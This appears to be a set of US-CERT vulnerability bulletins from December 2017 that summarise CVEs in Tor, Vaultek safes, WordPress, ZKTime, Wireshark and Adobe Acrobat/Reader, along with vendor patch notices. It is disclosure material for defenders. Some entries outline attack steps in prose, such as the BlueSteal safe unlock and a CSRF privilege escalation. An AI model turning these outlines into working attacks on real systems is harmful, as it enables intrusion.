In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, an attacker can cause a denial of service (application hang) via crafted PEM input that signifies a public key requiring a password, which triggers an attempt by the OpenSSL library to ask the user for the password, aka TROVE-2017-011.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-8821
Source & Patch Info: CONFIRM, CONFIRM, DEBIAN

tor -- tor
In Tor before 0.2.5.16, 0.2.6 through 0.2.8 before 0.2.8.17, 0.2.9 before 0.2.9.14, 0.3.0 before 0.3.0.13, and 0.3.1 before 0.3.1.9, the replay-cache protection mechanism is ineffective for v2 onion services, aka TROVE-2017-009. An attacker can send many INTRODUCE2 cells to trigger this issue.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-8819
Source & Patch Info: CONFIRM, CONFIRM, DEBIAN

tor -- tor
Tor before 0.2.8.12 might allow remote attackers to cause a denial of service (client crash) via a crafted hidden service descriptor.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2016-1254
Source & Patch Info: SUSE, SUSE, CONFIRM, CONFIRM, FEDORA, FEDORA, CONFIRM, DEBIAN

vaultek -- vt20_series_gun_safe
An issue was discovered in the software on Vaultek Gun Safe VT20i products, aka BlueSteal. An attacker can remotely unlock any safe in this product line without a valid PIN code. Even though the phone application requires it and there is a field to supply the PIN code in an authorization request, the safe does not check the PIN code, so an attacker can obtain authorization using any value. Once an attacker sees the Bluetooth Low Energy (BLE) advertisement for the safe, they need only to write a BLE characteristic to enable notifications, and send a crafted getAuthor packet that returns a temporary key, and an unlock packet including that temporary key. The safe then opens after the unlock packet is processed, with no verification of PIN or other credentials.
Published: 2017-12-06 | CVSS Score: not yet calculated | CVE-2017-17435
Source & Patch Info: MISC

vaultek -- vt20_series_gun_safe
An issue was discovered in the software on Vaultek Gun Safe VT20i products. There is no encryption of the session between the Android application and the safe. The website and marketing materials advertise that this communication channel is encrypted with "Highest Level Bluetooth Encryption" and "Data transmissions are secure via AES256 bit encryption." These claims, however, are not true. Moreover, AES256 bit encryption is not supported in the Bluetooth Low Energy (BLE) standard, so it would have to be at the application level. This lack of encryption allows an individual to learn the passcode by eavesdropping on the communications between the application and the safe.
Published: 2017-12-06 | CVSS Score: not yet calculated | CVE-2017-17436
Source & Patch Info: MISC

vivo -- modems
Vivo modems allow remote attackers to obtain sensitive information by reading the index.cgi?page=wifi HTML source code, as demonstrated by ssid and psk_wepkey fields.
Published: 2017-12-08 | CVSS Score: not yet calculated | CVE-2017-17463
Source & Patch Info: MISC

vmware -- vmware
The implementation of the OSPF protocol in VMware NSX-V Edge 6.2.x prior to 6.2.8 and NSX-V Edge 6.3.x prior to 6.3.3 doesn't correctly handle the link-state advertisement (LSA). A rogue LSA may exploit this issue, resulting in continuous sending of LSAs between two routers that eventually goes into a loop, or in loss of connectivity.
Published: 2017-12-05 | CVSS Score: not yet calculated | CVE-2017-4920
Source & Patch Info: BID, CONFIRM

wireshark -- wireshark
In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the CIP Safety dissector could crash. This was addressed in epan/dissectors/packet-cipsafety.c by validating the packet length.
Published: 2017-12-01 | CVSS Score: not yet calculated | CVE-2017-17085
Source & Patch Info: BID, CONFIRM, CONFIRM, CONFIRM

wireshark -- wireshark
In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the IWARP_MPA dissector could crash. This was addressed in epan/dissectors/packet-iwarp-mpa.c by validating a ULPDU length.
Published: 2017-12-01 | CVSS Score: not yet calculated | CVE-2017-17084
Source & Patch Info: BID, CONFIRM, CONFIRM, CONFIRM

wireshark -- wireshark
In Wireshark 2.4.0 to 2.4.2 and 2.2.0 to 2.2.10, the NetBIOS dissector could crash. This was addressed in epan/dissectors/packet-netbios.c by ensuring that write operations are bounded by the beginning of a buffer.
Published: 2017-12-01 | CVSS Score: not yet calculated | CVE-2017-17083
Source & Patch Info: BID, CONFIRM, CONFIRM, CONFIRM

wordpress -- wordpress
wp-admin/user-new.php in WordPress before 4.9.1 sets the newbloguser key to a string that can be directly derived from the user ID, which allows remote attackers to bypass intended access restrictions by entering this string.
Published: 2017-12-02 | CVSS Score: not yet calculated | CVE-2017-17091
Source & Patch Info: BID, MISC, MISC, MISC, MISC

wordpress -- wordpress
wp-includes/general-template.php in WordPress before 4.9.1 does not properly restrict the lang attribute of an HTML element, which might allow attackers to conduct XSS attacks via the language setting of a site.
Published: 2017-12-02 | CVSS Score: not yet calculated | CVE-2017-17093
Source & Patch Info: BID, MISC, MISC, MISC, MISC

wordpress -- wordpress
The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.
Published: 2017-12-06 | CVSS Score: not yet calculated | CVE-2017-17451
Source & Patch Info: MISC, MISC, MISC

wordpress -- wordpress
wp-includes/functions.php in WordPress before 4.9.1 does not require the unfiltered_html capability for upload of .js files, which might allow remote attackers to conduct XSS attacks via a crafted file.
Published: 2017-12-02 | CVSS Score: not yet calculated | CVE-2017-17092
Source & Patch Info: BID, MISC, MISC, MISC, MISC

wordpress -- wordpress
Cross-site scripting (XSS) vulnerability in the Content Cards plugin before 0.9.7 for WordPress allows remote attackers to inject arbitrary JavaScript via crafted OpenGraph data.
Published: 2017-12-03 | CVSS Score: not yet calculated | CVE-2017-17096
Source & Patch Info: CONFIRM, MISC

wordpress -- wordpress
wp-includes/feed.php in WordPress before 4.9.1 does not properly restrict enclosures in RSS and Atom fields, which might allow attackers to conduct XSS attacks via a crafted URL.
Published: 2017-12-02 | CVSS Score: not yet calculated | CVE-2017-17094
Source & Patch Info: BID, MISC, MISC, MISC, MISC

zktime -- web_software
The ZKTime Web Software 2.0.1.12280 allows the Administrator to elevate the privileges of the application user using a 'password_change()' function of the Modify Password component, reachable via the old_password, new_password1, and new_password2 parameters to the /accounts/password_change/ URI. An attacker takes advantage of this scenario and creates a crafted CSRF link to add himself as an administrator to the ZKTime Web Software. He then uses social engineering methods to trick the administrator into clicking the forged HTTP request. The request is executed and the attacker becomes the Administrator of the ZKTime Web Software. If the vulnerability is successfully exploited, then an attacker (who would be a normal user of the web application) can escalate his privileges and become the administrator of ZKTime Web Software.
Published: 2017-12-04 | CVSS Score: not yet calculated | CVE-2017-17056
Source & Patch Info: MISC, BID

zktime -- web_software
There is a reflected XSS vulnerability in ZKTime Web 2.0.1.12280. The vulnerability exists due to insufficient filtration of user-supplied data in the 'Range' field of the 'Department' module in a Personnel Advanced Query. A remote attacker can execute arbitrary HTML and script code in the browser in the context of the vulnerable application.
Published: 2017-12-04 | CVSS Score: not yet calculated | CVE-2017-17057
Source & Patch Info: MISC, BID



Microsoft Releases December 2017 Security Updates

Original release date: December 12, 2017

Microsoft has released updates to address vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Microsoft's December 2017 Security Update Summary and Deployment Information and apply the necessary updates.




Apple Releases Security Updates

Original release date: December 12, 2017

Apple has released security updates to address vulnerabilities in AirPort Base Station. An attacker could exploit some of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review the Apple security pages for AirPort Base Station Firmware Update 7.6.9 and Firmware Update 7.7.9 and apply the necessary updates.




Transport Layer Security (TLS) Vulnerability

Original release date: December 13, 2017

CERT Coordination Center (CERT/CC) has released information on a Transport Layer Security (TLS) vulnerability. Exploitation of this vulnerability could allow an attacker to access sensitive information.

The TLS vulnerability is also known as Return of Bleichenbacher's Oracle Threat (ROBOT). ROBOT allows an attacker to obtain the RSA key necessary to decrypt TLS traffic under certain conditions. Mitigations include installing updates to affected products as they become available. US-CERT encourages users and administrators to review CERT/CC Vulnerability Note VU #144389.




Apple Releases Security Updates

Original release date: December 13, 2017

Apple has released security updates to address vulnerabilities in multiple products. A remote attacker could exploit one of these vulnerabilities to take control of an affected system.

US-CERT encourages users and administrators to review Apple security pages for the following products and apply the necessary updates:




Google Releases Security Update for Chrome

Original release date: December 14, 2017

Google has released Chrome version 63.0.3239.108 for Windows, Mac, and Linux. This version addresses a vulnerability that an attacker could exploit to take control of an affected system.

US-CERT encourages users and administrators to review the Chrome Releases page and apply the necessary update.





SB17-352: Vulnerability Summary for the Week of December 11, 2017

Original release date: December 18, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division into high, medium, and low severities corresponds to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.


High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the MakeAccessible plugin, when creating an internal data structure. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16360 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of an out of bounds read vulnerability in the MakeAccessible plugin, when handling font data. It causes an out of bounds memory access, which sometimes triggers an access violation exception. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees, potentially leading to code corruption, control-flow hijack, or an information leak attack. | 2017-12-09 | 9.3 | CVE-2017-16362 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the module that handles character codes for certain textual representations. Invalid input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc. | 2017-12-09 | 9.3 | CVE-2017-16363 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference when handling number format dictionary entries. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16364 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the True Type2 Font parsing module. A corrupted cmap table input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc. | 2017-12-09 | 9.3 | CVE-2017-16365 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability. The vulnerability leads to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads or writes -- potentially leading to code corruption, control-flow hijack, or an information leak attack. | 2017-12-09 | 9.3 | CVE-2017-16367 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability leads to a stack-based buffer overflow condition in the internal Unicode string manipulation module. It is triggered by an invalid PDF file, where a crafted Unicode string causes an out of bounds memory access of a stack allocated buffer, due to improper checks when manipulating an offset of a pointer to the buffer. Attackers can exploit the vulnerability and achieve arbitrary code execution if they can effectively control the accessible memory. | 2017-12-09 | 9.3 | CVE-2017-16368 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16370 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript engine. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16371 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16372 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16373 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the JPEG 2000 module. An invalid JPEG 2000 input code stream leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc. | 2017-12-09 | 9.3 | CVE-2017-16374 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16375 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the MakeAccessible plugin. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16376 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized in the main DLL. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory. | 2017-12-09 | 9.3 | CVE-2017-16377 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized; the computation occurs during internal AST thread manipulation. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory. | 2017-12-09 | 9.3 | CVE-2017-16378 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability in the graphics rendering engine. | 2017-12-09 | 9.3 | CVE-2017-16379 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability for a certain file-type extension. Acrobat maintains both a blacklist and whitelist (the user can specify an allowed attachment). However, any file extensions that are neither on the blacklist nor the whitelist can still be opened after displaying a warning prompt. | 2017-12-09 | 9.3 | CVE-2017-16380 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value when processing TIFF files embedded within an XPS document. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16381 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16382 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a heap overflow vulnerability when processing a JPEG file embedded within an XPS document. | 2017-12-09 | 9.3 | CVE-2017-16383 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the exif processing module for a PNG file (during XPS conversion). Invalid input leads to a computation where pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc. | 2017-12-09 | 9.3 | CVE-2017-16384 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in TIFF parsing during XPS conversion. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16385 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS2PDF conversion engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16386 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG2000 codec. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16387 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript API engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16388 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16389 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine API. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16390 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the printing functionality. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space. | 2017-12-09 | 9.3 | CVE-2017-16391 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the JPEG processing module. Crafted input with an unexpected JPEG file segment size causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16392 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16393 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16394 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the image conversion module when processing Enhanced Metafile Format (EMF). Crafted EMF input (EMR_STRETCHDIBITS) causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16395 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the TIFF processing module. Crafted input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16396 (BID, SECTRACK, CONFIRM)
adobe -- acrobat_and_reader | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of Enhanced Metafile Format (EMF) processing within the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16397 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution. | 2017-12-09 | 9.3 | CVE-2017-16398 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the XPS parsing module. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16399 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG 2000 parser. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16400 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of an image conversion, specifically in Enhanced Metafile Format Plus (EMF +) processing modules. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16401 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JPEG 2000 module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16402 (BID, SECTRACK, CONFIRM)
adobe -- acrobat | An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure. | 2017-12-09 | 9.3 | CVE-2017-16403 (BID, SECTRACK, CONFIRM)
